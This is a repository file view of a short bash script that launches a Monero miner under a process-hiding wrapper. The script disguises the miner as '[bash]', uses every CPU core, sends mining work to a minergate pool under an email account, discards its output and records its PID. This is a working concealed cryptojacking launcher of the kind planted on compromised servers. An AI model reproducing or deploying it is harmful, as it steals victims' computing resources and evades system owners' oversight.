limit fstBC to 30bp in Python3 ver.
[GalaxyCodeBases.git] / etc / Server / hiding / run
blob6bd991b2085c45ae2e92fd60075bd1329d63fb8c
1 #!/bin/bash
3 proc=`nproc`
4 ARCH=`uname -m`
5 HIDE="[bash]"
7 if [ "$ARCH" == "i686" ]; then
8 ./h32 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://dunhill9999%40hotmail.com:x@xmr.pool.minergate.com:45560/xmr >>/dev/null &
9 elif [ "$ARCH" == "x86_64" ]; then
10 ./h64 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://dunhill9999%40hotmail.com:x@xmr.pool.minergate.com:45560/xmr >>/dev/null &
12 echo $! > bash.pid